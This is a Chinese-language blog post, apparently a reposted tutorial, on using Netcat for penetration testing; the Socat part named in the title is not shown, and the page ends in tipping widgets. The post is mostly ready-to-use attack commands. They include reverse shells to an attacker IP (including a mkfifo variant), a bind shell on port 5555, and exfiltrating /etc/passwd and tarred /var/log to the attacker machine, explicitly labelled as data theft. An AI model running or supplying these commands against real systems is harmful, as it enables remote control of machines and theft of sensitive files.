Day8 Kali黑客工具NetCat和Socat

泷羽Sec-静安,专注网络安全与编程技术的学习与分享,探索技术细节与实际应用。声明:本公众号所分享的工具与资源,仅供学习与研究使用,严禁用于任何非法活动。

Netcat(nc)

Netcat(nc)因其灵活的TCP/UDP通信能力,在红队渗透测试中扮演着重要角色。• Netcat下载:Windows版nc.exe可从Sysinternals Suite获取。后台回复“配套工具”获取本文的工具

1. 反向Shell获取控制权

用途:绕过防火墙限制,建立隐蔽的远程控制通道。
操作步骤

  1. 攻击端监听(接收Shell):

    nc -lvp 4444 -e /bin/bash   # 传统方法(需目标支持-e参数)
    
  2. 目标端连接(主动回连):

    nc [攻击者IP] 4444 -e /bin/bash   # 直接执行Shell
    

    绕过限制技巧(无-e参数时):

    mkfifo /tmp/f; nc [攻击者IP] 4444 < /tmp/f | /bin/bash > /tmp/f 2>&1
    

    优势:通过命名管道实现无-e参数环境下的Shell反弹。

2. 端口扫描与监听

用途:快速探测目标开放端口或搭建临时服务。
实战命令
端口扫描(快速识别脆弱服务):

nc -zv 192.168.1.100 1-1024   # 扫描1-1024端口(-z为扫描模式,-v显示详情)

监听端口(捕获敏感流量):

nc -l -p 8080 > captured_data.log   # 记录所有传入数据到文件

3. 文件传输与数据窃取

用途:内网横向移动时快速交换工具或窃取数据。
操作示例
单向传输

# 接收端(攻击机):
nc -l -p 1234 > stolen_data.tar.gz

# 发送端(目标机):
nc [攻击者IP] 1234 < /etc/passwd   # 发送敏感文件

目录批量传输(结合tar压缩):

# 目标机打包发送:
tar -czf - /var/log/ | nc [攻击者IP] 1234

# 攻击机接收解压:
nc -l -p 1234 | tar -xzvf -

4. 内网穿透与端口转发

用途:突破网络边界,访问受限内网资源。
典型场景
正向代理(目标机可直连外网):

# 目标机监听内网服务:
nc -l -p 5555 -e /bin/bash   # 暴露Shell到本地5555端口

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

泷羽Sec-静安

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值